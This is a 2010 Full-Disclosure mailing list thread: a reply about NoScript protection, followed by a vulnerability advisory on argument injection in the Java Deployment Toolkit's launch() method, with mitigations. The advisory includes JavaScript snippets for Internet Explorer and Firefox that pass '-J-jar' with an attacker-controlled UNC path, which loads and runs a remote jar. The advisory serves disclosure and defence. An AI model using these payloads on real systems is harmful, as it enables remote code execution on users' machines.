Re: [Full-disclosure] Java Deployment Toolkit Performs Insufficient Validation of Parameters

[Nick Boyce]

On Fri, Apr 9, 2010 at 12:08 PM, Tavis Ormandy  wrote:

> ---
> Mitigation
> ---
[...]
> - Mozilla Firefox and other NPAPI based browser users can be protected using
>  File System ACLs to prevent access to npdeploytk.dll.

Just for the record (since I had to go hunting to find out), Giorgio
Maone says NoScript will protect Firefox users (so long as you haven't
whitelisted the relevant website for other purposes) :
http://forums.informaction.com/viewtopic.php?f=8&t=4207

As a lot of folks are concluding, it's better to just uninstall Java
altogether (at least till Soracle sorts out the various appalling
design decisions they seem to have made with this product), but some
of us are stuck with workstations that need Java installed for one
reason or another.

Cheers
Nick
-- 
Leave the Olympics in Greece, where they belong.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Java Deployment Toolkit Performs Insufficient Validation of Parameters

[Tavis Ormandy]

Java Deployment Toolkit Performs Insufficient Validation of Parameters
-

Java Web Start (henceforth, jws) provides java developers with a way to let
users launch and install their applications using a URL to a Java Networking
Launching Protocol (.jnlp) file (essentially some xml describing the
program).

Since Java 6 Update 10, Sun has distributed an NPAPI plugin and ActiveX control
called "Java Deployment Toolkit" to provide developers with a simpler method
of distributing their applications to end users. This toolkit is installed by
default with the JRE and marked safe for scripting.

The launch() method provided by the toolkit object accepts a URL string, which
it passes to the registered handler for JNLP files, which by default is the
javaws utility.

$ cmd /c ver
Microsoft Windows XP [Version 5.1.2600]

$ java -version
java version "1.6.0_19"
Java(TM) SE Runtime Environment (build 1.6.0_19-b04)
Java HotSpot(TM) Client VM (build 16.2-b04, mixed mode, sharing)

$ cat 
/proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/JNLPFile/Shell/Open/Command/\@
"C:\Program Files\Java\jre6\bin\javaws.exe" "%1"

The toolkit provides only minimal validation of the URL parameter, allowing us
to pass arbitrary parameters to the javaws utility, which provides enough
functionality via command line arguments to allow this error to be exploited.

The simplicity with which this error can be discovered has convinced me
that releasing this document is in the best interest of everyone except
the vendor.


Affected Software


All versions since Java SE 6 update 10 for Microsoft Windows are believed to be
affected by this vulnerability. Disabling the java plugin is not sufficient to
prevent exploitation, as the toolkit is installed independently.

http://java.sun.com/javase/6/docs/technotes/guides/jweb/deployment_advice.html

I believe non-Windows installations are unaffected.


Consequences
---

Exploitation of this issue is not terribly exciting, but is potentially of high
enough impact to merit explanation. The javaws application supports the
following command line parameters.

$ javaws -help
Usage:  javaws [run-options] 
javaws [control-options]

where run-options include:  
  -verbose  display additional output   
  -offline  run the application in offline mode 
  -system   run the application from the system cache only
  -Xnosplashrun without showing a splash screen 
  -Jsupply option to the vm 
  -wait start java process and wait for its exit

control-options include:
  -viewer   show the cache viewer in the java control panel
  -uninstallremove all applications from the cache
  -uninstall remove the application from the cache   
  -import [import-options]   import the application to the cache 

import-options include: 
  -silent   import silently (with no user interface)
  -system   import application into the system cache
  -codebaseretrieve resources from the given codebase  
  -shortcut install shortcuts as if user allowed prompt 
  -association  install associations as if user allowed prompt  

Perhaps the most interesting of these is -J, and the obvious attack is simply
to add -jar followed by an attacker controlled UNC path to the jvm command
line, which I've demonstrated below. Other attacks are clearly possible, but
this is sufficient to demonstrate the problem.

In order to trigger this attack in Internet Explorer, an attacker would use a
code sequence like this

/* ... */
var o = document.createElement("OBJECT");

o.classid = "clsid:CAFEEFAC-DEC7---ABCDEFFEDCBA";

o.launch("http: -J-jar -Jattacker.controlled\\exploit.jar none");
/* ... */

Or, for Mozilla Firefox

/* ... */
var o = document.createElement("OBJECT");

o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"

document.body.appendChild(o);

o.launch("http: -J-jar -Jattacker.controlled\\exploit.jar none");
/* ... */

Please note, at some point the registered MIME type was changed to
application/java-deployment-toolkit, please verify which type applies to
your users when verifying any mitigation implemented has been effective (the
simplest way would be to look at the output of about:plugins on a reference
machine).

A harmless demonstration is provided at the URL below.

http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html

---
Mitigation
---

If you believe your users may be affected, you should consider applying one of
the workarounds described below as a matter of urgency.

- Internet Explorer users can be protected by temporarily setting the killbit
  on CAFEEFAC-DEC7-